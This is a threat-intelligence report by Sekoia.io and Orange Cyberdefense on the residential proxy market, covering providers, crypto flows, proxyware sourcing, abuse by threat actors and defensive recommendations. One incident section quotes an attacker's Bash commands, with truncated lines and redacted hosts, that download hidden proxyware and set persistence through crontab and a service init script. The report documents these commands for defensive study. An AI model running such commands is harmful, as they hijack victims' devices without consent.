{
	"id": "3a7d952c-ccfa-427c-bbe1-7ceba4a5778e",
	"created_at": "2026-04-06T00:14:03.703471Z",
	"updated_at": "2026-04-10T03:37:32.656993Z",
	"deleted_at": null,
	"sha1_hash": "c7349c7f4f8237977d2e2d9fcbcc1fef2f429afe",
	"title": "Uncovering residential proxy providers: Risks and market insights",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5142280,
	"plain_text": "Uncovering residential proxy providers: Risks and market insights\r\nPublished: 2024-03-14 · Archived: 2026-04-02 12:29:55 UTC\r\nData in this article\r\nTL;DR\r\nIntroduction\r\nInside the offering world of RESIP providers\r\nA fragmented yet interconnected ecosystem\r\nResidential IP pool creation\r\nNavigating Greyhat and Blackhat uses\r\nRecommendations\r\nConclusion\r\nAppendixes\r\nTL;DR\r\nResidential proxies are intermediaries that allow an Internet connection to appear as coming from from\r\nanother host;\r\nThis method allows a user to hide the real origin and get an enhanced privacy or an access to geo-restricted\r\ncontent;\r\nResidential proxies represent a growing threat in cyberspace, frequently used by attacker groups to hide\r\namong legitimate traffic, but also in a legitimate way;\r\nThe ecosystem of these proxies is characterised by a fragmented and deregulated offering in legitimate and\r\ncybercrime webmarkets;\r\nTo obtain an infrastructure up to several million hosts, residential proxies providers use techniques that can\r\nmislead users who install third-party software;\r\nWith millions of IP addresses available, they represent a massive challenge to be detected by contemporary\r\nsecurity solutions;\r\nDefending against this threat requires increased vigilance over the origin of traffic, which may not be what\r\nit seems, underlining the importance of a cautious and informed approach to managing network traffic;\r\nThis joint report is built on extensive research from Sekoia.io Threat Detection \u0026 Research (TDR) and\r\nOrange Cyberdefense’s World Watch teams.\r\nIntroduction\r\nOn 25 January 2024 Microsoft released public guidance on how to defend against nation-state groups in which the\r\ngroup reported an espionage campaign byAPT29, a Russia-nexus intrusion set attributed by the US and UK\r\ngovernments to the Russian intelligence service SVR, that targeted Microsoft aiming to gather information about\r\nthemselves. 
In order to increase their operation security, APT29 operators relied on an (unnamed) Residential\r\nProxies (RESIP for RESIdential Proxies) service provider.\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 1 of 28\n\nIssues tied to RESIP are not well-known to the public, and neither by the cybersecurity community. While RESIP\r\nservice providers can be used for some legitimate uses, they are heavily abused by various types of cyber threat\r\nactors. In this report, analysts from Sekoia.io and Orange Cyberdefense delve into the phenomenon of RESIP,\r\nexplore the actual market landscape, which is composed of multiple shady providers, and explain how cyber threat\r\nactors abuse or even directly provide such services.\r\nFor several years, the financially motivated cybercrime ecosystem has been marked by the commodification of\r\nalmost every single step of an attack chain. While this trend can be interpreted as a sign of economic maturity\r\noutside of the cyber realm, this labour division implies that cyber operations now increasingly rely on a\r\nmultitude of third-party stakeholders. These providers specialise in services ranging from phishing kit creation,\r\nvulnerability research, bullet-proof hosting, traffic generation, malware development, etc. As highlighted by recent\r\nreports emanating from the cybersecurity community, RESIP has become an integral part of many malicious\r\noperations ranging from DDoS, cyberespionage, or financially motivated malware campaigns (1,2,3,4,5,6,). In\r\nmost cases, these proxies are used to conceal the last mile of the threat actor’s traffic before accessing or\r\ninteracting with a victim’s environment.\r\nBy definition, RESIP are “rentable” IP addresses assigned to residential devices used as an intermediary gateway\r\nbetween two hosts, facilitating the anonymisation of the former. 
RESIP typically encompasses real users' devices\r\nsuch as desktop, laptop computers, smartphones and even IoT devices. The residential IP addresses through\r\nwhich the traffic is proxied are most often Internet Service Providers’ (ISPs) subscribers and are particularly\r\nuseful in comparison with datacenter proxies or VPN IPs that are catalogued as belonging to commercial IP pools\r\nand not to genuine Internet “users”.\r\nOver the last few years, RESIP has attracted the attention of some security researchers and academics. Valuable\r\ninsights on how they work can notably be found in public reports from Trend Micro, DomainTools, Spur, etc. (see\r\nAppendix B: Literature on suspicious RESIP). Nevertheless, this subject often remains overlooked and\r\nobscure. This joint study by Orange Cyberdefense and Sekoia.io therefore aims to complete the existing literature\r\non RESIP and to provide a better picture of this ecosystem and the threats it embodies.\r\nIndeed, whether you or your company already rented access to RESIP, or if you are unfamiliar with this topic, we\r\nbelieve it is necessary to grasp the full scope of such a service and its main issues as a matter of both risk\r\nassessment and general awareness. Throughout this report, we will notably illustrate how the mere existence and\r\ncurrent systemic growth of RESIP can be problematic in two main dimensions:\r\nthe lack of transparency in the sourcing of RESIP constituting the pool of proxies advertised by these\r\nproviders.\r\nas mentioned above, the increasing adoption of RESIP by cyber actors to avoid being identified.\r\nThis joint report builds on extensive research from Sekoia.io Threat Detection \u0026 Research (TDR) and\r\nOrange Cyberdefense’s World Watch teams. It is also based on unique sightings we detected within our\r\nrespective clients’ base, with more than 10 clients identified as impacted by the presence of at least one proxyware\r\nwithin their corporate perimeters. 
In at least 3 sightings, this proxyware, which transforms “infected” device into a\r\npossible remote access point, had been installed through the download of free software by users. In another\r\ncase, we notably observed technical artefacts pointing to a phishing campaign leveraging a fairly well-known\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 2 of 28\n\nRESIP provider. This prompted us to check for additional risks induced, uncovering for example a client with\r\nmultiple machines which used this RESIP service. Now fully remediated, this incident highlights the subtle yet\r\nactive use of RESIP by various kinds of cyber actors, a tactic often going unnoticed by organisations even though\r\nit is not difficult to detect. At the end of this report, we provide technical indicators that can be leveraged for\r\nspecific threat hunting within your environments.\r\nInside the offering world of RESIP providers\r\nThis section aims at providing a comprehensive understanding of the RESIP providers activities, mainly those\r\noperating on forums prized by cybercriminals.\r\nMethodology\r\nFor our analysis, we monitored and analysed publications on 5 forums where RESIP providers are most active: \r\nBreachForums, \r\nNulled, \r\nXSS, \r\nBlackHatWorld,\r\nZelenka.\r\nFigure 1 - Results page for RESIP search on Nulled forum (as of 08/02/2024)\r\nWe analysed over 50 RESIP offerings on these forums throughout 2023 to identify any patterns and structuring\r\ntrends associated with this specific type of service. Of these providers, the vast majority emerged during 2023 (the\r\ncut off date being November 2023).\r\nFrom our observations, most publications promoting RESIP services are easy to access, compared to some\r\nmore “underground”, knowingly illicit, services. Indeed, they use explicit titles on ads published on Clear Web-accessible forums. 
\r\nComparing the ads displayed on the observed forums enabled us to notice that a larger segment of RESIP\r\nadvertisements occur on well-established, “low tier” forums such as BlackHatWorld (BHW) or Nulled, which tend\r\nto gather an audience not exclusively involved in cybercrime, i.e. greyhat activities. As a reminder, while Nulled\r\nemerged around 2014, BHW surfaced in the early 2000s and continues to attract individuals who are also looking\r\nfor legitimate services ranging from copywriting, web design, social media marketing, etc.\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 3 of 28\n\nDuring the time frame of our analysis, at least 5 to 10 new threads offering RESIP were posted each month on\r\nBlackHatWorld, in addition to older but still active threads being “refreshed” to appear on the first page of the\r\nforum section. For instance, the most replied thread promoting RESIP on BlackHatWorld dates back to November\r\n2013 and counts around 6,000 replies.\r\nAnalysis of a standard offering\r\nA typical ad features a series of key characteristics:\r\nDescription of the services (i.e. if datacenter, mobile and/or residential IPs) sometimes using a screenshot\r\nof the welcome page of the provider's website;\r\nKey information such as the size of the IP addresses’ pool, the number of countries available, the price\r\nrange, etc;\r\nContact information and URLs for purchases.\r\nFigure 1 bis - Example of an ad for LumiProxy posted on BHW (as of 29/02/2024)\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 4 of 28\n\nThe pricing of RESIP on cybercrime platforms is often determined by the durations of the subscriptions, from\r\nshort to long-term. Prices are commonly calculated on a one-month basis. 
Longer subscription periods offer\r\nsavings compared to shorter-term commitments, encouraging users to commit to extended periods, providing a\r\ncertain level of stable revenues for the platform.\r\nAs the RESIP market is highly crowded, providers need to differentiate themselves from competitors. Among the\r\nadopted strategies, we observed the following:\r\nSize and localization of the IP pool, i.e. number of proxies “rented”, in particular on highly demanded\r\ncountries;\r\nFinancial incentives, the pricing model often relies on traffic volume allocated to users, on a fixed per-gigabyte basis. We also observed RESIP providers repeatedly offering discounted prices based on volume\r\nor to attract new customers;\r\nAccepted payment methods, and in particular anonymous cryptocurrencies.\r\nSimplified purchase process flow, automating access to the service immediately after payment;\r\n24/7 dedicated support, responsive customer services are commonly guaranteed by most RESIP (mainly\r\nvia dedicated Telegram accounts).\r\nProviders often redirect customers for the actual purchase of the service to their website but also to a dedicated\r\nsales email address, Telegram channel, WhatsApp number or Discord server. It should be noted that some\r\nproviders don't necessarily (and sometimes purposely) own a dedicated website and prefer to sell their services\r\ndirectly through Telegram. The diagram above highlights the different sales channels adopted by the RESIP\r\nbelonging to our study sample.\r\nFigure 2 - Sales channels used by our sample of RESIP providers\r\nMoreover, most RESIP providers advertise services they market quite freely, using typical marketing methods\r\nsuch as Google ads to boost the ranking of their website on search engines (i.e. 
Search Engine Optimisation), or\r\nadvertisements in dedicated blog posts comparing the best RESIP.\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 5 of 28\n\nProfiling the sellers\r\nFrom our observations, the accounts advertising RESIP services on studied forums were created specifically for\r\npromoting each of these providers respectively.\r\nMost of the advertisements we studied were written in English or in Russian (to a lesser extent), or in both\r\nlanguages in the case of Zelenka, a mostly Russian-speaking forum. \r\nThrough OSINT analysis, we tried to identify the geographical origin of the providers, by pivoting on the official\r\nbusiness name and potential businesses registration matricula, if possible. We noticed a lot of the RESIP we\r\nanalysed are actually either not registered as an official legal entity in their respective country or possess only\r\n“mailbox” offices in a country without stringent legislations on the topic (ex. the British Virgin Islands).\r\nTurning a blind eye\r\nThe mere existence of ads for RESIP in cybercrime-oriented forums obviously raises questions on the ethical\r\nnature of the RESIP providers’ market positioning. They know users active on these forums have a strong\r\npotential to become customers but may conduct illegal activities. It thus deeply roots the RESIP ecosystem\r\ninto a shady and underground dimension. Interestingly enough, this proximity with other cybercrime-oriented\r\nservices also tends to contrast a lot with the presumed clean, transparent or even \"start-up like'' aspects of most of\r\nthe RESIP websites.\r\nThis contradiction is also visible in the lack of transparency on most RESIP legal existence, on how unclear their\r\nIP pools are constituted and in their general lack of concern about what their proxies are used for. 
Two key\r\nindicators for this are the often absence of KYC measures as well as permissive ToS and Conditions of Use most\r\nRESIP adopt (if any). \r\nAbsence of KYC and compliance measures\r\nKnow-Your-Customer (KYC) is the process of identifying and verifying the client's identity when getting an\r\naccount and periodically over time. It is considered as a measure ensuring that a client doesn’t make a malicious\r\nuse of its account. Some business-oriented RESIP providers claim to adhere to such KYC processes, such as\r\nOxylabs. Some providers also put forward security compliance insurances to attempt certifying their products as\r\nsafe. This is for instance the case of EarnApp, as directly shown in this retrieved Google sheet.\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 6 of 28\n\nFigure 3 - Example of compliance measures put forward by EarnApp\r\nThese KYC regulations are required in most Western countries. However, they are less or not enforced in some\r\ncountries where providers are established (Hong Kong, Russia, Cyprus, etc.)\r\nIn our sample of RESIP ads observed on underground forums, 100% of the providers we analysed did not mention\r\nany KYC measures: no ID proof, age verification, postal address or business registration information were\r\nrequired, etc. These providers typically offer immediate access to the service as soon as the payment is received. \r\nTerms of Services\r\nMost providers protect themselves with terms of service clearly stating that customers are responsible for the\r\nactivity done with the rented proxies, and that they must abide by all applicable laws. This enables RESIP\r\nproviders from being sued for the actions conducted by their clients through their services. 
It should nonetheless\r\nbe noted that several RESIP, especially those located in Hong Kong, still explicitly forbid the use of their RESIP\r\nfor leveraging illegal and criminal activities such as money laundering, stealing trade secrets and personal\r\ninformation. \r\nEthically-sourced proxies, a needed “brandwashing”\r\nMany providers willing to appear reputable have to fight for their brand image, and thus argue their proxies are\r\n\"ethically-sourced\". Unfortunately, not a lot of details on the actual processes used to acquire proxies are\r\nprovided. Some do mention the restrictions they added and declare having a due diligence process before\r\naccepting new proxies. We doubt these verifications are sufficient to detect motivated cybercriminals willing to\r\nmonetise their botnets, nor that providers are investing sufficiently to track and tackle abuse of their services.\r\nA fragmented yet interconnected ecosystem\r\nUpon further analysis, we also identified strong overlaps between different RESIP. The sometimes “hidden”\r\nconnections we found enable us to believe the RESIP market could be less fragmented than what it seems.\r\nMade-up fragmentation\r\nIndeed, some seemingly distinct RESIP can be in fact closely interconnected, either by belonging to the same legal\r\nentity, by sharing a consistent portion of their server infrastructure or by using common cryptocurrency channels. \r\nIn the case of PiaS5Proxy, our investigation revealed associations with 5 additional proxy (or VPN) providers.\r\nIndeed, PiaS5Proxy, ABCProxy and 922Proxy list the same Ethereum (a.k.a. ETH) wallet address on their\r\nrespective websites. This overlap is particularly significant, as this specific wallet is the one that features the most\r\ntransactions compared to other cryptocurrency wallets. 
In addition, the three RESIP providers rely on another\r\nETH wallet (0x8379c994c5c39fc9c66bf5b55aa796920e532511) used further along in the transaction chain to\r\ngather and aggregate all their ETH incomes. This one gathered almost 400,000$ but is unused since the end of\r\nJanuary 2024.\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 7 of 28\n\nPiaS5Proxy is tied to an entity named MARS BROTHERS LIMITED (an Android developer active since\r\n2022), mentioned directly in PiaS5Proxy’s website and registered in Hong Kong since March 2022.\r\nAdditionally, PiaS5Proxy appears to have links with an entity called HONGKONG GUANGLING MDT\r\nINFOTECH LIMITED, as shown on their website and the corresponding LinkedIn profile. This organisation,\r\nwhich is also registered in Hong Kong since September 2018, is mentioned on the websites of ABCProxy and\r\n922Proxy as well as on the website of the now-defunctFlyGateVPN service, according to archived website\r\nrecords.\r\nFinally, PiaS5Proxy also mentions on its website a third legal entity called ROME BELDEN LIMITED, which\r\nwas also registered in Hong Kong in March 2023. This same entity name is mentioned on the websites of\r\nLunaProxy and PyProxy.\r\nFigure 4 - Ties around PiaProxy organisational cluster\r\nDedicated shops and reselling channels \r\nBeyond the RESIP that openly and directly advertise their services on forums, a vast network of resellers also\r\nemerged in the last few years. We notably observed the activity of shops such as NightShop and ProxyWave Shop,\r\nspecialised in reselling access from known RESIP.\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 8 of 28\n\nThe proliferation of resellers and dedicated shops is indicative of increasingly diversified supply chain models on\r\na highly lucrative market. 
It is highly likely driven by an escalating demand for anonymity and further fuels the\r\naccessibility of RESIP for an increasing number of malicious actors.\r\nRebranding\r\nFurthermore, some RESIP tend to rebrand over time, adopting a new name, visual identity, and website to\r\nrelaunch their business activities. Rebranding is far from being unique to this market segment and typically occurs\r\nwhen a business wishes to increase brand image after a certain period. \r\nYet, this practice is also useful to mitigate the impact of negative reviews or events attached to the brand:\r\nstarting a new is a way to detach oneself from controversies and past reputation hits. This is for instance the case\r\nof Luminati, that is now Bright Data. Or IPRoyal, a UAE-based RESIP, which rebranded in December 2023 to\r\nPawns.app and justified this decision by wanting “to change the perception of who we are and what we value”.\r\nFinancial flows related to RESIP \r\nAnother key aspect when it comes to understanding this RESIP ecosystem and its transparency is understanding\r\nhow lucrative it really is. \r\nMost RESIP welcome a great variety of payment methods, including credit cards, cryptocurrencies or PayPal. The\r\ndiagram below reveals the propensity of our sample to favour certain payment methods. More than half of the\r\nRESIP we encountered accepted cryptocurrencies to carry their financial transactions with their customers. In\r\nsome limited cases (less than 5), cryptocurrencies were the only valid payment method.\r\nFigure 5 - Payment methods used by our sample of RESIP providers\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 9 of 28\n\nWe were able to further our investigation into the crypto wallets used by some of the RESIP belonging to our\r\nsample. 
Despite the intense volatility of the amount of money in these wallets over time, we notably identified\r\nseveral wallets that collected between $25K up to $36K worth of Bitcoin. We believe these amounts may not be\r\nrepresentative as wallets belonging to more prolific RESIP could actually have collected way more. \r\nFurthermore, a trend we noticed is the short lifetime of the wallets publicly visible on the RESIP website’s order\r\npage. The average lifespan of cryptocurrency wallets seems to be around 230-250 days. From a hypothetical point\r\nof view, it seems that RESIP tends to renew their wallets every year, typically letting their cryptocurrency wallets\r\ninactive for between 230 and 250 days before resuming activity at the beginning of the year. This particular\r\nobservation suggests the possibility of a deliberate strategy by RESIP to cover their tracks and increase the\r\ndiscretion of their blockchain transactions.\r\nAnother trend we identified when specifically analysing Ethereum and Tron blockchains wallets for PiaS5Proxy,\r\nABCProxy and 922Proxy, is the recurring movement of funds to a central wallet, with such “concentration”\r\ntransactions being replicated by several other wallets once they reach a certain amount. This repetitive process\r\nreinforces the idea of a deliberate desire to centralise amounts, suggesting a concerted strategy to consolidate\r\ndispersed assets, often ending up on Binance and optimising the management of assets on the blockchain and\r\nmaximising their efficiency.\r\nResidential IP pool creation\r\nIn the previous section, we explored the market of RESIP providers, highlighting the shady practices and\r\nfragmented nature of it. What sets these rented proxies apart is their ability to offer IP addresses in specific\r\ncountries that appear to be ordinary home connections, making them particularly effective at bypassing\r\ngeographical blocks and bot or fraud detection filters. 
\r\nHowever, a key question remains: how do these RESIP networks build up their vast pool of IP addresses? We\r\nexamined in detail the mechanisms and strategies deployed to create and manage these IP pools in this section. \r\nThe size of the pool of IP addresses plays a crucial role for RESIP. Expanding this network involves acquiring\r\nmany links, i.e. individual connection points. These exit points include IP addresses from home routers, personal\r\ncomputers, smart TVs and increasingly, mobile phones using 4G and 5G networks. This process demands not only\r\nengaging directly with numerous individual users worldwide willing to “rent” for a fee access to their bandwidth.\r\nBut also implement more dubious and even illicit techniques to acquire without consent access to geographically\r\ndispersed Internet accesses.\r\nVoluntary contributions\r\nOne public strategy adopted by RESIP is the involvement of conscious and willing users. These users download\r\nand install specific software on their devices, called proxyware, enabling them to act as exit points for the\r\nRESIP network. In exchange for the bandwidth they allow to flow through their IP, these users are paid,\r\ndepending on the amount of traffic transmitted. 
Notable examples of this practice include Pawns.app, EarnApp,\r\nand HoneyGain.\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 10 of 28\n\nFigure 6 - Pawns.app download page, offering different platforms to users wishing to take part in\r\nthe rewards program\r\nThese providers encourage users to share their unused bandwidth in exchange for financial compensation,\r\noften without users having a full understanding of the end use of their internet connection.\r\nIntegration into applications via SDKs\r\nThe second method RESIP uses involves embedding proxyware into SDKs (Software Development Kits), present\r\nin many types of applications: desktop software, browser plugins, or even in Android or iOS mobile\r\napplications. Developers can register and receive a kit to integrate proxyware easily into their software.\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 11 of 28\n\nFigure 7 - Example of a Bright Data SDK documentation page for a developer wishing to integrate\r\nproxyware into his software\r\nUnlike the voluntary contributions by IP address owners, this approach is more subtle. In this case, the proxyware\r\nis often embedded in a product or service. Users may not notice a proxyware will be installed when accepting the\r\nterms of use of the main application it is embedded with. This lack of transparency leads to users sharing their\r\nInternet connection without a clear understanding.\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 12 of 28\n\nFigure 8 - Example of Bright Data proxyware in the Free Snipping Tool and Megacubo software on\r\nWindows\r\nThis approach raises ethical questions about transparency and consent. 
Users may feel misled if they discover\r\nthat their Internet connection is being used for purposes they had not fully intended.\r\nEven if sometimes the techniques can be seen as deceptive, consent is still somehow requested, compared to other\r\npractices described below.\r\nInstallation via a compromised system\r\nFinally, a particularly malicious practice involves compromising devices and clandestinely installing proxyware\r\non them. In these cases, the attackers infiltrate their victims' systems without their consent and secretly install the\r\nsoftware, making the device an unwitting exit point for the RESIP network.\r\nIn 2023, we observed a compromise of one of our partners, initially detected following an unusual increase in\r\nnetwork traffic on one of the systems monitored. An investigation of this machine revealed that a proxyware had\r\nbeen installed without the user’s consent. Forensic analysis determined the method used by the attacker to install\r\nand hide this proxyware service was directly associated with Pawns.app.\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 13 of 28\n\nFigure 9 - Chain of compromise leading to the installation of proxyware\r\nAfter accessing the system via an SSH connection, the attacker downloads a binary, enabling him to establish his\r\nown SSL/TLS tunnel via revsocks. This file was hosted on a device that appears to have been previously\r\ncompromised, and used as a relay to store all the necessary binaries. The attacker then executes a series of\r\ncommands in Bash, which we will detail below.\r\nFirstly, the attacker modifies the host's DNS configuration by specifying the use of Cloudflare's DNS. 
This step\r\naims to avoid being blocked by a pre-existing configuration.\r\n grep -qF 'nameserver 1.1.1.1' /rom/etc/resolv.conf || echo 'nameserver 1.1.1.1' \u003e /rom/etc/\r\nThe attacker then sets up a system process, in this case the “whatchdog” process, with proxyware.\r\n $ pidof whatchdog || pgrep whatchdog || ash -c \"wget -O /tmp/logs/.config/whatchdog [REDACT\r\nAfterwards, the attacker downloads a binary called \"iparmv6\" onto the host. This executable, belonging to\r\nPawns.app, is packed using UPX. Of note, the attacker has previously configured his account, as evidenced by\r\nusing his credential as an argument during the execution of the proxyware.\r\nFinally, the attacker has set up persistent execution of the binary via the Linux crontab, enabling the following\r\ncommands to be launched regularly:\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 14 of 28\n\ncroncmd1=\"/tmp/logs/.config/chron || cd /tmp/logs/.config \u0026\u0026 wget -O chron [REDACTED]/chront\r\n croncmd2=\"grep -qF 'nameserver 1.1.1.1' /etc/resolv.conf || echo 'nameserver 1.1.1.1' \u003e\u003e /etc/\r\n cronjob1=\"*/10 * * * * $croncmd1\"\r\n cronjob2=\"@reboot $croncmd2\"\r\n ( crontab -l | grep -v -F \"$croncmd1\" ;echo -e \"$cronjob1\") | crontab -\r\n ( crontab -l | grep -v -F \"$croncmd2\" ;echo -e \"$cronjob2\") | crontab -\r\nAfter performing this persistent installation, the attacker actively explores other locations to duplicate the binary,\r\ntargeting services such as lighttpd for further implementation. This strategy aims to consolidate the continuity of\r\nits passive revenues, as shown in this command:\r\n grep -qxF '/home/user/chron' /etc/init.d/lighttpd || echo '/home/user/chron' \u003e\u003e /etc/init.d/\r\nThis command checks the existence of the line /home/user/chron in the lighttpd service initialisation script. If this\r\nline is not present, it adds it to the file. 
As a result, the /home/user/chron script is executed each time the lighttpd\r\nservice is started. On the same host, similar actions have been repeated several times, with scripts offering\r\nidentical functionality but under different names. It is also important to note that the attacker is using the current\r\nhost to install and make accessible via the Internet all the binaries deployed during his installation. Indeed,\r\nmultiple SSH connections to various hosts were observed from the initially compromised machine, and the same\r\nfiles were found by following these IP addresses.\r\nThe files installed are Pawns.app binaries, compressed with UPX, and compatible with several processor\r\narchitectures: ARM, x32, x64. In this way, the victim's host is used to compromise other hosts as well, making it\r\ndifficult to determine the attacker's origin.\r\nAlthough Pawns.app is a legitimate service used in the B2B sector, it is a reality that it is exploited by malicious\r\nactors who compromise systems, without the victim's knowledge.\r\nDespite their simplicity compared to the more sophisticated techniques seen in other attack campaigns in 2024, the\r\nuse of these basic commands is all the more effective against devices such as personal routers or connected\r\nobjects, which often lack robust security mechanisms. As a result, without even being aware of it, a user can\r\nunwittingly become part of a pool of proxies offered by a RESIP.\r\nNavigating Greyhat and Blackhat uses\r\nGreyhat use\r\nResidential proxies are widely used by companies or individuals for several legitimate purposes, including to\r\naccess geographically-restricted web resources. These services are marketed mostly for enabling massive Web\r\nhttps://www.orangecyberdefense.com/global/blog/research/residential-proxies\r\nPage 15 of 28\n\nscraping in particular for “Market research”, i.e. competitors and price monitoring. 
An important example of\r\nRESIP usage is the operating of “sneaker bots”, i.e. automated bots designed to ‘cop’ rare shoes sold online. \r\nA few more use cases are often mentioned:\r\nAd verification (for advertisers);\r\nCustomer analysis (review brand reputation of own clients);\r\n“MultiLogin”: register multiple accounts on the same online service.\r\nAs seen below on the website of PiaS5 Proxy, some use cases are sometimes a bit far-fetched. Some even mention\r\nproxies can help enhance their “Brand protection”.\r\nFigure 10 - Examples of uses for PiaS5 Proxy\r\nThese usages are not per se what people would define as illicit. Yet, this usage of RESIP is also far from being\r\nfully transparent and legitimate. Using RESIP for sneaker bots actually entirely conflicts with Terms of Use from\r\nonline retailers which explicitly prohibit the use of any automated scraping techniques. Indeed, by making\r\nmultiple requests from different IP addresses thus locations, the buyer effectively bypasses the various security\r\nmeasures put in place by the web application to try to enforce these ToU (including geolocation restriction, IP\r\nthrottling or blocking, CAPTCHAs, etc). \r\nIn the absence of general law or regulation related to RESIP in France and Europe, these Terms of Use become the\r\ncontractual law of reference. This implies that even some usages of RESIP which might not be considered as\r\n“illegal” under the blurry category of cybercrime could actually embody an illicit situation because of ToU\r\nbypassing. \r\nUnfortunately, for e-commerce providers willing to take action against RESIP abuse, a favourable legal decision is\r\nhighly uncertain and costly. No legal precedents or jurisprudence seem to exist in the market. \r\nBlackhat use\r\nThese RESIP are also used directly to conduct cyberattacks and to launch malicious campaigns. 
Throughout our\r\nresearch, including on public reports by CTI analysts and cybersecurity vendors, we observed several cases where\r\nthese proxies were integrated in different types of attack chains:\r\nCyberespionage-related password spraying attacks\r\nIn a campaign detailed by Microsoft, APT29 leveraged RESIP networks to route their traffic interacting with the\r\ncompromised tenant through a vast number of IP addresses blending with legitimate users’ traffic;\r\nFinancially-motivated social engineering campaigns\r\nMandiant reports that UNC3944 (a.k.a. Scattered Spider) used RESIP services to target their victims to\r\ncircumvent location-based security controls;\r\nDDoS attacks\r\nmany campaigns relying on RESIP were recorded, including the attack against the Philippine media company\r\nRappler (which notably leveraged the infrastructure of FineProxy and Rayobyte). According to Qurium’s report,\r\nboth companies’ infrastructure has previously been linked to pay-as-you-go DDoS services;\r\nBrute force attacks\r\ne.g. the ones against the Standard Bank and the online payment system Venmo;\r\nPhishing\r\nnumerous Phishing-as-a-Service tools and platforms include or leverage RESIP in their offerings. This is notably\r\nthe case of the Caffeine platform that relies on Froxy for its adversary-in-the-middle capabilities;\r\nBotnet-led spam campaigns\r\nAT\u0026T notably detailed in August 2023 a RESIP botnet targeting macOS systems and Windows users with a\r\nmalware called AdLoad. The objective of this RESIP botnet is still unclear, but so far it has already been\r\ndetected delivering spam campaigns. 
\r\nTo sum up, cyber actors have been trying to bypass security measures set by organisations and further evade\r\ndetection by relying on RESIP to hide their actual IP address behind ones commonly associated with home users,\r\nwhich are unlikely to be present in blocklists. Indeed, this makes it hard for protection mechanisms to discern\r\nbetween suspicious and regular traffic. This technique makes traditional indicator-of-compromise-based detection\r\ndifficult due to the high churn rate of IP addresses. \r\nIt should be noted that a few service providers created or leveraged by cyber actors for “blackhat” activities were\r\nnevertheless sued in the past, with limited results. Microsoft, for example, took over a botnet abusing the NO-IP\r\nservice, the leading dynamic DNS provider, in 2014. But it somehow backfired as impacts were felt by legitimate\r\nNO-IP customers. Anti-piracy consortium BREIN also sued Ecatel / Quasi Networks in 2018, but even in this\r\ncase, this malicious hosting provider escaped the ruling by ceasing operations (and most probably rebranding\r\nunder a new name). Finally, combating these illegal usages of RESIP remains difficult since the market is heavily\r\nfragmented, meaning no single provider is a major-enough actor worth tackling. One malicious provider going down\r\nwould only mean cyber actors would move on to any of the numerous other providers.\r\nRecommendations\r\nDue to the risks of running proxyware within a corporate network, i.e. 
actually having unapproved software\r\ninstalled on a managed device, organisations should preemptively ban installation of proxyware (via application\r\nblack/whitelisting, user rights restriction, internal firewall/ACL rules, etc.).\r\nThose willing to identify proxyware already installed (or attempts to install such programs) within their networks\r\nshould regularly hunt for the presence of specific known IOCs (network- and host-based ones, as you can find\r\nin Appendix C), on top of configuring detection strategies for suspicious traffic behaviour.\r\nSekoia and Orange Cyberdefense specialise in defending against a wide range of threats, including\r\nproxyware, so do not hesitate to contact our representatives if you want to assess the risks for your\r\nnetworks, conduct specific hunting or proactively block them on your systems.\r\nWe can for instance help you configure some of your security solutions to try to block proxies internally, and\r\nenrich suspicious events investigated by your SOC teams, with our constantly up-to-date Threat Intelligence. \r\nIf your company needs to acquire RESIP services for legitimate use cases, you should rely on a stringent due\r\ndiligence process to select a reputable RESIP as much as possible. On top of the contractual terms of service to\r\ncheck diligently, consider the following criteria:\r\nthe existence of a legal entity based in a European Union country, \r\nthe KYC processes used by this provider, \r\nthe ethics on how the proxies are collected,\r\nif dedicated proxies (vs. 
shared ones) are available, \r\nif traceable transactions (no cryptocurrencies) are accepted, \r\netc.\r\nInternet users should protect their mobile and desktop devices by:\r\nConsented use: \r\nrefrain from joining a proxy network, \r\nor at the very least, opt only for reputable providers based in the European Union.\r\nUnconsented use (deceived or hacked): \r\navoid installing free programs, in particular free VPNs, but also free mobile or TV apps, browser\r\nplugins, etc. that may bundle proxyware (or even malware) without your actual knowledge, \r\nif you do, carefully read the ToS of any application you install, and deactivate the proxy feature\r\nwhen possible,\r\ndon’t click on Sponsored results from search engines (and social networks),\r\ndon’t install programs from outside of the official app stores,\r\ndon’t download cracked software (or actually any application) using Torrent or unsafe distribution\r\nchannels,\r\nconfigure OS users with limited rights (and keep Administrator accounts for management\r\npurposes), \r\netc.\r\nConclusion\r\nInvestigations performed by the analysts at Sekoia.io and Orange Cyberdefense highlight the current challenges\r\nassociated with the proliferation of RESIPs. While RESIP-related activities are not malicious per se, they do\r\nfacilitate both espionage and lucrative campaigns. RESIP services are highly prized by attackers for their\r\neffectiveness in evading attribution following malicious campaigns, including hacking, fraud and denial-of-service. \r\nOn the one hand, the lack of transparency regarding providers’ legal status, IP pool creation and adherence to\r\nKYC measures raises ethical concerns and casts doubt on their reputation. While the concept of “ethically-sourced”\r\nproxies emerges as a potential solution, the effectiveness of such branding remains uncertain. 
